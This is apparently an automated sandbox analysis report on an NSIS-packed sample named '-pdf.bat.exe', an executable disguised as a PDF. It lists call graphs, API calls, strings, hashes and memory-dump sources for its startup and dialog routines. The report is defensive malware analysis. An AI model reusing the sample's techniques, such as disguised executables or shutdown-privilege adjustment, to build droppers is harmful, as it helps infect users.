3968->3967 3976 4055eb 3969->3976 3971 4059b1 3972 4055eb SendMessageW 3971->3972 3974 4059c3 OleUninitialize 3972->3974 3973 40598a 3973->3971 3979 401399 3973->3979 3977 405603 3976->3977 3978 4055f4 SendMessageW 3976->3978 3977->3973 3978->3977 3980 401413 3979->3980 3982 4013a3 3979->3982 3980->3973 3982->3980 3983 4013df MulDiv SendMessageW 3982->3983 3984 40154a 3982->3984 3983->3982 3985 4015c3 3984->3985 3988 4015ce 3984->3988 3986 4016c1 3985->3986 3987 4017c2 3985->3987 3985->3988 3989 4015e6 3985->3989 3990 4018cb 3985->3990 3991 4016ef 3985->3991 3992 4016af 3985->3992 3993 40182f 3985->3993 3994 401711 3985->3994 3995 401633 SetForegroundWindow 3985->3995 3996 4017d3 3985->3996 3997 4015d5 3985->3997 3998 401618 3985->3998 3999 4015f9 3985->3999 4000 40189b 3985->4000 4001 4018de 3985->4001 4002 40163f 3985->4002 4047 40160c 3985->4047 4013 4016d1 ShowWindow 3986->4013 4014 4016d9 3986->4014 4004 40303e 21 API calls 3987->4004 3988->3982 3989->3988 4003 4015f0 PostQuitMessage 3989->4003 4008 40303e 21 API calls 3990->4008 4015 40303e 21 API calls 3991->4015 4130 406734 wsprintfW 3992->4130 4011 40303e 21 API calls 3993->4011 4005 40303e 21 API calls 3994->4005 3995->3988 4007 40303e 21 API calls 3996->4007 3997->3988 4027 405e3d 28 API calls 3997->4027 4009 403002 21 API calls 3998->4009 4030 401399 85 API calls 3999->4030 4006 40303e 21 API calls 4000->4006 4010 40303e 21 API calls 4001->4010 4002->3988 4033 403002 21 API calls 4002->4033 4003->3988 4017 4017c8 4004->4017 4018 401718 4005->4018 4019 4018a2 SearchPathW 4006->4019 4020 4017da 4007->4020 4021 4018d2 4008->4021 4023 40161e Sleep 4009->4023 4024 4018e5 4010->4024 4025 401835 GetFullPathNameW 4011->4025 4013->4014 4014->3988 4026 4016e6 ShowWindow 4014->4026 4016 4016f6 SetFileAttributesW 4015->4016 4016->3988 4134 4066e4 FindFirstFileW 4017->4134 4096 406cda CharNextW CharNextW 4018->4096 4019->3988 4031 40303e 21 API calls 4020->4031 4111 406b6b 4021->4111 4022 405e3d 28 API calls 4022->3988 4023->3988 4040 401906 4024->4040 4041 40190e 4024->4041 4035 40184d 4025->4035 4036 401857 4025->4036 4026->3988 4027->3988 4030->3988 4034 4017e3 4031->4034 4033->3988 4039 40303e 21 API calls 4034->4039 4035->3988 4037 401889 GetShortPathNameW 4035->4037 4036->4035 4048 4066e4 2 API calls 4036->4048 4037->3988 4038 401780 4046 401790 4038->4046 4038->4047 4043 4017ec MoveFileW 4039->4043 4142 406c2f lstrcpynW 4040->4142 4143 406c2f lstrcpynW 4041->4143 4042 40670b CharNextW 4066 401720 4042->4066 4049 401804 4043->4049 4050 4017f8 4043->4050 4053 405e3d 28 API calls 4046->4053 4047->4022 4054 40186a 4048->4054 4049->3988 4057 4066e4 2 API calls 4049->4057 4050->4047 4051 40190c 4060 406e52 5 API calls 4051->4060 4052 401919 4144 40666b lstrlenW CharPrevW 4052->4144 4056 401797 4053->4056 4054->4035 4141 406c2f lstrcpynW 4054->4141 4110 406c2f lstrcpynW 4056->4110 4064 401814 4057->4064 4091 40192b 4060->4091 4064->3988 4137 406352 MoveFileExW 4064->4137 4065 4017a2 SetCurrentDirectoryW 4065->3988 4066->4038 4066->4042 4068 401769 GetFileAttributesW 4066->4068 4102 406611 4066->4102 4105 405f41 CreateDirectoryW 4066->4105 4131 405f21 CreateDirectoryW 4066->4131 4068->4066 4069 401968 4147 406cb2 GetFileAttributesW 4069->4147 4071 4066e4 2 API calls 4071->4091 4074 40193f CompareFileTime 4074->4091 4075 401a18 4077 405e3d 28 API calls 4075->4077 4076 4019fd 4078 405e3d 28 API calls 4076->4078 4079 401a24 4077->4079 4078->3988 4116 4032c7 4079->4116 4081 406c2f lstrcpynW 4081->4091 4083 401a52 SetFileTime 4084 401a60 CloseHandle 4083->4084 4084->3988 4086 401a73 4084->4086 4085 405fbd 21 API calls 4085->4091 4087 401a78 4086->4087 4088 401a89 4086->4088 4089 405fbd 21 API calls 4087->4089 4090 405fbd 21 API calls 4088->4090 4092 401a80 lstrcatW 4089->4092 4093 401a91 4090->4093 4091->3997 4091->4069 4091->4071 4091->4074 4091->4075 4091->4076 4091->4081 4091->4085 4115 406a30 GetFileAttributesW CreateFileW 4091->4115 4150 406bbd 4091->4150 4092->4093 4095 406bbd MessageBoxIndirectW 4093->4095 4095->3988 4097 406cf8 4096->4097 4098 406d2f 4096->4098 4099 406d07 CharNextW 4097->4099 4100 406d0c 4097->4100 4098->4066 4099->4098 4100->4098 4101 40670b CharNextW 4100->4101 4101->4100 4103 4069fb 5 API calls 4102->4103 4104 406618 4103->4104 4104->4066 4106 405f8c GetLastError 4105->4106 4107 405faf 4105->4107 4106->4107 4108 405f99 SetFileSecurityW 4106->4108 4107->4066 4108->4107 4109 405fb3 GetLastError 4108->4109 4109->4107 4110->4065 4112 406b78 GetTickCount GetTempFileNameW 4111->4112 4113 406bb0 4112->4113 4114 406bac 4112->4114 4113->3988 4114->4112 4114->4113 4115->4091 4117 4032f0 4116->4117 4118 4032d5 SetFilePointer 4116->4118 4154 403148 GetTickCount 4117->4154 4118->4117 4123 403148 46 API calls 4124 403329 4123->4124 4125 403391 ReadFile 4124->4125 4126 403338 4124->4126 4127 401a3a 4124->4127 4125->4127 4126->4127 4128 406a5d ReadFile 4126->4128 4169 406b20 WriteFile 4126->4169 4127->4083 4127->4084 4128->4126 4130->3988 4132 405f33 GetLastError 4131->4132 4133 405f3b 4131->4133 4132->4133 4133->4066 4135 4066fa FindClose 4134->4135 4136 406705 4134->4136 4135->4136 4136->3988 4138 406373 4137->4138 4139 406366 4137->4139 4138->4050 4205 40641b 4139->4205 4141->4035 4142->4051 4143->4052 4145 40191f lstrcatW 4144->4145 4146 406688 lstrcatW 4144->4146 4145->4051 4146->4145 4148 406cd4 4147->4148 4149 406cc4 SetFileAttributesW 4147->4149 4148->4091 4149->4148 4151 406bd2 4150->4151 4152 406c20 4151->4152 4153 406be8 MessageBoxIndirectW 4151->4153 4152->4091 4153->4152 4155 4032b3 4154->4155 4156 403173 4154->4156 4157 4033e9 36 API calls 4155->4157 4171 403131 SetFilePointer 4156->4171 4164 40329a 4157->4164 4159 40317e SetFilePointer 4162 4031a5 4159->4162 4162->4164 4165 406b20 WriteFile 4162->4165 4166 4032a4 SetFilePointer 4162->4166 4172 406fbd 4162->4172 4180 40311b 4162->4180 4183 4033e9 4162->4183 4164->4127 4167 406a5d ReadFile 4164->4167 4165->4162 4166->4155 4168 403312 4167->4168 4168->4123 4168->4127 4170 406b41 4169->4170 4170->4126 4171->4159 4173 406fe8 4172->4173 4174 406fe0 4172->4174 4173->4174 4175 407123 4173->4175 4176 407109 GlobalAlloc 4173->4176 4177 4070ff GlobalFree 4173->4177 4174->4162 4175->4174 4178 407196 GlobalAlloc 4175->4178 4179 40718f GlobalFree 4175->4179 4176->4174 4176->4175 4177->4176 4178->4174 4179->4178 4181 406a5d ReadFile 4180->4181 4182 40312e 4181->4182 4182->4162 4184 403411 4183->4184 4185 4033f8 4183->4185 4188 403423 GetTickCount 4184->4188 4189 40341a 4184->4189 4186 403401 DestroyWindow 4185->4186 4187 403408 4185->4187 4186->4187 4187->4162 4191 403431 4188->4191 4192 40348d 4188->4192 4200 406324 4189->4200 4194 403468 CreateDialogParamW ShowWindow 4191->4194 4195 40343a 4191->4195 4192->4162 4194->4192 4195->4192 4204 4033cb MulDiv 4195->4204 4197 403448 wsprintfW 4198 405e3d 28 API calls 4197->4198 4199 403466 4198->4199 4199->4162 4201 406336 PeekMessageW 4200->4201 4202 40632c DispatchMessageW 4201->4202 4203 403421 4201->4203 4202->4201 4203->4162 4204->4197 4206 406471 GetShortPathNameW 4205->4206 4207 40644b 4205->4207 4208 406551 4206->4208 4209 406486 4206->4209 4232 406a30 GetFileAttributesW CreateFileW 4207->4232 4208->4138 4209->4208 4211 40648e wsprintfA 4209->4211 4213 405fbd 21 API calls 4211->4213 4212 406455 CloseHandle GetShortPathNameW 4212->4208 4214 406469 4212->4214 4215 4064b7 4213->4215 4214->4206 4214->4208 4233 406a30 GetFileAttributesW CreateFileW 4215->4233 4217 4064c4 4217->4208 4218 4064cf GetFileSize GlobalAlloc 4217->4218 4219 40654a CloseHandle 4218->4219 4220 4064ee 4218->4220 4219->4208 4221 406a5d ReadFile 4220->4221 4222 4064f6 4221->4222 4222->4219 4234 406c4b lstrlenA lstrlenA 4222->4234 4225 406556 4227 406c4b 3 API calls 4225->4227 4226 406509 lstrcpyA 4229 40651b 4226->4229 4227->4229 4228 40652c SetFilePointer 4230 406b20 WriteFile 4228->4230 4229->4228 4231 406543 GlobalFree 4230->4231 4231->4219 4232->4212 4233->4217 4235 406505 4234->4235 4236 406c6a 4234->4236 4235->4225 4235->4226 4236->4235 4237 406c97 lstrlenA 4236->4237 4237->4235 4237->4236 5488 405036 5489 405042 5488->5489 5490 40505a 5488->5490 5498 406b4f GetDlgItemTextW 5489->5498 5492 405060 SHGetPathFromIDListW 5490->5492 5493 40508e 5490->5493 5494 405070 5492->5494 5495 40504f SendMessageW 5492->5495 5497 401533 102 API calls 5494->5497 5495->5493 5497->5495 5498->5495 5499 401ab6 5500 40303e 21 API calls 5499->5500 5501 401abd 5500->5501 5502 406bbd MessageBoxIndirectW 5501->5502 5503 401709 5502->5503 5504 703110c7 5511 703110f8 5504->5511 5505 703112be GlobalFree 5506 703111d7 GlobalAlloc 5506->5511 5507 70311258 GlobalFree 5507->5511 5508 70311548 3 API calls 5508->5511 5509 703112ba 5509->5505 5510 70311296 GlobalFree 5510->5511 5511->5505 5511->5506 5511->5507 5511->5508 5511->5509 5511->5510 5512 703115eb 2 API calls 5511->5512 5514 70311165 GlobalAlloc 5511->5514 5515 70311638 lstrcpyW 5511->5515 5513 703111ca GlobalFree 5512->5513 5513->5511 5514->5511 5516 703111ab GlobalFree 5515->5516 5516->5511 5517 70311cc7 5518 70311cee 5517->5518 5519 70311d4e 5518->5519 5520 70311d2f GlobalFree 5518->5520 5521 703115eb 2 API calls 5519->5521 5520->5519 5522 70311de5 GlobalFree GlobalFree 5521->5522 5523 402837 5524 40303e 21 API calls 5523->5524 5527 401afd 5524->5527 5526 402855 5527->5523 5527->5526 5528 406a30 GetFileAttributesW CreateFileW 5527->5528 5528->5527 5529 703112c6 5530 7031101b 5 API calls 5529->5530 5531 703112df 5530->5531 5532 401fb8 GetDC 5533 403002 21 API calls 5532->5533 5534 401fc8 GetDeviceCaps MulDiv ReleaseDC 5533->5534 5535 403002 21 API calls 5534->5535 5536 401ff8 5535->5536 5537 405fbd 21 API calls 5536->5537 5538 402032 CreateFontIndirectW 5537->5538 5539 401dba 5540 403002 21 API calls 5539->5540 5541 401dc1 5540->5541 5542 403002 21 API calls 5541->5542 5543 401dce 5542->5543 5544 401de1 5543->5544 5545 40303e 21 API calls 5543->5545 5546 401df6 5544->5546 5547 40303e 21 API calls 5544->5547 5545->5544 5548 401e50 5546->5548 5549 401e01 5546->5549 5547->5546 5550 40303e 21 API calls 5548->5550 5551 403002 21 API calls 5549->5551 5552 401e55 5550->5552 5553 401e06 5551->5553 5554 40303e 21 API calls 5552->5554 5555 403002 21 API calls 5553->5555 5557 401e5e FindWindowExW 5554->5557 5556 401e11 5555->5556 5558 401e41 SendMessageW 5556->5558 5559 401e1e SendMessageTimeoutW 5556->5559 5560 401e7b 5557->5560 5558->5560 5559->5560 4816 70311a4a 4817 70311aa1 4816->4817 4818 70311a5a VirtualProtect 4816->4818 4818->4817 5561 401bbb 5562 40303e 21 API calls 5561->5562 5563 401bc4 ExpandEnvironmentStringsW 5562->5563 5564 401bd7 5563->5564 5566 401be9 5563->5566 5565 401bdd lstrcmpW 5564->5565 5564->5566 5565->5566

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00403804 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416stringfilecomCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 403804-40384d SetErrorMode GetVersionExW 1 403886 0->1 2 40384f-40386f GetVersionExW 0->2 5 40388d-403892 1->5 3 403871-403875 2->3 4 403882-403884 2->4 6 403878-403880 3->6 4->6 7 403894-40389d 5->7 8 40389f 5->8 6->5 9 4038a3-4038e5 7->9 8->9 10 4038e7-4038ef call 4069fb 9->10 11 4038f8 9->11 10->11 16 4038f1 10->16 13 4038fd-40390f call 4062b3 lstrlenA 11->13 18 403911-40392d call 4069fb * 3 13->18 16->11 25 40393e-4039d7 #17 OleInitialize SHGetFileInfoW call 406c2f GetCommandLineW call 406c2f call 40670b CharNextW 18->25 26 40392f-403935 18->26 35 403ab4-403ace GetTempPathW call 403da8 25->35 36 4039dd 25->36 26->25 30 403937 26->30 30->25 42 403ad0-403aee GetWindowsDirectoryW lstrcatW call 403da8 35->42 43 403b26-403b40 DeleteFileW call 40348f 35->43 38 4039df-4039e5 36->38 40 4039f2-4039fd 38->40 41 4039e7-4039f0 38->41 44 403a08-403a17 40->44 45 4039ff-403a06 40->45 41->40 41->41 42->43 59 403af0-403b20 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403da8 42->59 61 403b42-403b48 43->61 62 403bb7 43->62 46 403a74-403a88 call 40670b 44->46 47 403a19-403a25 44->47 45->44 69 403a90-403a96 46->69 70 403a8a-403a8d 46->70 50 403a27-403a2e 47->50 51 403a3f-403a45 47->51 55 403a30-403a33 50->55 56 403a35 50->56 57 403a63-403a6a 51->57 58 403a47-403a4e 51->58 55->51 55->56 56->51 57->46 67 403a6c-403a72 57->67 58->57 66 403a50-403a57 58->66 59->43 59->62 63 403ba9-403bb0 call 405b41 61->63 64 403b4a-403b5c call 40670b 61->64 65 403bb9-403bc6 call 4037c2 OleUninitialize 62->65 79 403bb5 63->79 83 403b72-403b74 64->83 84 403bcc-403bd9 call 406bbd ExitProcess 65->84 85 403d0f-403d16 65->85 75 403a59-403a5c 66->75 76 403a5e 66->76 67->46 77 403aa0-403aaf call 406c2f 67->77 69->35 71 403a98-403a9b 69->71 70->69 71->38 75->57 75->76 76->57 77->35 79->62 86 403b76-403b7d 83->86 87 403b5e-403b64 83->87 89 403d94-403da2 85->89 90 403d18-403d2e GetCurrentProcess OpenProcessToken 85->90 93 403bdf-403bf7 call 406611 lstrcatW 86->93 94 403b7f-403b8f call 40674d 86->94 91 403b66-403b6d 87->91 92 403b6f 87->92 96 403d30-403d5e LookupPrivilegeValueW AdjustTokenPrivileges 90->96 97 403d64-403d72 call 4069fb 90->97 91->86 91->92 92->83 107 403c08-403c29 lstrcatW lstrcmpiW 93->107 108 403bf9-403c03 lstrcatW 93->108 94->62 106 403b91-403ba7 call 406c2f * 2 94->106 96->97 104 403d80-403d8b ExitWindowsEx 97->104 105 403d74-403d7e 97->105 104->89 109 403d8d-403d8f call 401533 104->109 105->104 105->109 106->63 107->62 111 403c2b-403c32 107->111 108->107 109->89 112 403c34-403c39 call 405f41 111->112 113 403c3b call 405f21 111->113 121 403c40-403c54 SetCurrentDirectoryW 112->121 113->121 123 403c65-403c81 call 406c2f 121->123 124 403c56-403c60 call 406c2f 121->124 128 403c82-403ca0 call 405fbd DeleteFileW 123->128 124->123 131 403ca2-403cb6 CopyFileW 128->131 132 403cef-403cf9 128->132 131->132 134 403cb8-403ce4 call 406352 call 405fbd call 4067eb 131->134 132->128 133 403cfb-403d0a call 406352 132->133 133->65 134->132 143 403ce6-403ced CloseHandle 134->143 143->132
                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403820
                                                                                                                                                • GetVersionExW.KERNEL32 ref: 00403849
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040385C
                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403904
                                                                                                                                                • #17.COMCTL32(?,0000000A,?), ref: 0040393E
                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403945
                                                                                                                                                • SHGetFileInfoW.SHELL32(004085D4,00000000,?,000002B4,00000000), ref: 00403964
                                                                                                                                                • GetCommandLineW.KERNEL32(00428D40,NSIS Error), ref: 00403979
                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\-pdf.bat.exe",?,"C:\Users\user\Desktop\-pdf.bat.exe",00000000), ref: 004039C5
                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403AC5
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403AD6
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403AE2
                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403AF6
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403AFE
                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403B0F
                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403B17
                                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403B31
                                                                                                                                                  • Part of subcall function 0040348F: GetTickCount.KERNEL32 ref: 004034A1
                                                                                                                                                  • Part of subcall function 0040348F: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\-pdf.bat.exe,00000400), ref: 004034BD
                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403BBE
                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403BD9
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403BF0
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408624,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C03
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C12
                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C21
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403C45
                                                                                                                                                • DeleteFileW.KERNEL32(004209F0,004209F0,?,0042A000,?), ref: 00403C9C
                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\-pdf.bat.exe,004209F0,?), ref: 00403CAE
                                                                                                                                                • CloseHandle.KERNEL32(00000000,004209F0,004209F0,?,004209F0,00000000), ref: 00403CE7
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403D1F
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403D26
                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403D3B
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403D5E
                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403D83
                                                                                                                                                  • Part of subcall function 0040670B: CharNextW.USER32(?,004039C4,"C:\Users\user\Desktop\-pdf.bat.exe",?,"C:\Users\user\Desktop\-pdf.bat.exe",00000000), ref: 00406721
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filelstrcat$Process$CharCurrentDeleteDirectoryEnvironmentExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountErrorHandleInfoInitializeLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                                                                                • String ID: 4jw$"C:\Users\user\Desktop\-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\-pdf.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                • API String ID: 354787867-154293319
                                                                                                                                                • Opcode ID: 0ecbbf3be232c534373af848fddc9e6d681202fbfdc88adff2eb4d376a06b390
                                                                                                                                                • Instruction ID: ea8d09071dbbbb8128f2a3040c0526679499edfae626c6519bb85817cf976ccd
                                                                                                                                                • Opcode Fuzzy Hash: 0ecbbf3be232c534373af848fddc9e6d681202fbfdc88adff2eb4d376a06b390
                                                                                                                                                • Instruction Fuzzy Hash: 8DD116716443116AD7207F619D46B3B7AACEF4874AF41443FF982B62D2DABC8E40872D
                                                                                                                                                Function 00404C33 Relevance: 54.3, APIs: 36, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 144 404c33-404c4a 145 404c50-404d1e GetDlgItem * 3 call 405606 call 405938 GetClientRect GetSystemMetrics SendMessageW * 2 144->145 146 404ddc-404de2 144->146 169 404d20-404d32 SendMessageW * 2 145->169 170 404d34-404d3a 145->170 148 404de4-404e0a GetDlgItem CreateThread CloseHandle 146->148 149 404e28-404e2e 146->149 151 404e10-404e19 call 40585e 148->151 152 404e30-404e3a 149->152 153 404e59-404e5f 149->153 163 404e1e-404e25 151->163 152->151 154 404e3c-404e57 ShowWindow * 2 call 405606 152->154 155 404e61-404e68 153->155 156 404ea7-404eaa 153->156 154->151 160 404e6a-404e74 155->160 161 404e7d-404e92 ShowWindow 155->161 156->151 164 404eb0-404eb4 156->164 166 404e76-404e7b call 405a5b 160->166 167 404ea3-404ea5 161->167 168 404e94-404e9e call 405e3d 161->168 164->151 171 404eba-404ed2 SendMessageW 164->171 166->151 167->166 168->167 169->170 176 404d46-404d5f call 40561d 170->176 177 404d3c-404d44 SendMessageW 170->177 172 404fe8-404fea 171->172 173 404ed8-404f0a CreatePopupMenu call 405fbd AppendMenuW 171->173 172->163 185 404f20-404f3c TrackPopupMenu 173->185 186 404f0c-404f1c GetWindowRect 173->186 183 404d61-404d75 ShowWindow 176->183 184 404d93-404db9 GetDlgItem SendMessageW 176->184 177->176 187 404d82 183->187 188 404d77-404d80 ShowWindow 183->188 184->172 190 404dbf-404dd7 SendMessageW * 2 184->190 185->172 189 404f42-404f4e 185->189 186->185 191 404d88-404d8e call 405606 187->191 188->191 192 404f56-404f70 SendMessageW 189->192 190->172 191->184 192->192 194 404f72-404f9c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 192->194 195 404f9e-404fca SendMessageW 194->195 195->195 196 404fcc-404fe2 GlobalUnlock SetClipboardData CloseClipboard 195->196 196->172
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00404C94
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00404CA4
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00404CE1
                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00404CE9
                                                                                                                                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404D0B
                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404D1A
                                                                                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404D28
                                                                                                                                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404D32
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404D44
                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404D68
                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404D7A
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00404D9C
                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404DB0
                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404DCB
                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404DD5
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404E4A
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 00404E4F
                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00404CB4
                                                                                                                                                  • Part of subcall function 00405606: SendMessageW.USER32(?,?,?,0040543B), ref: 00405614
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00404DF5
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005967,00000000), ref: 00404E03
                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00404E0A
                                                                                                                                                • ShowWindow.USER32(?), ref: 00404E85
                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404EC4
                                                                                                                                                • CreatePopupMenu.USER32 ref: 00404ED8
                                                                                                                                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404EF4
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00404F12
                                                                                                                                                • TrackPopupMenu.USER32(?,?,?,?,00000000,?,00000000), ref: 00404F34
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F63
                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00404F73
                                                                                                                                                • EmptyClipboard.USER32 ref: 00404F79
                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404F85
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00404F92
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404FAE
                                                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 00404FD1
                                                                                                                                                • SetClipboardData.USER32(0000000D,?), ref: 00404FDC
                                                                                                                                                • CloseClipboard.USER32 ref: 00404FE2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
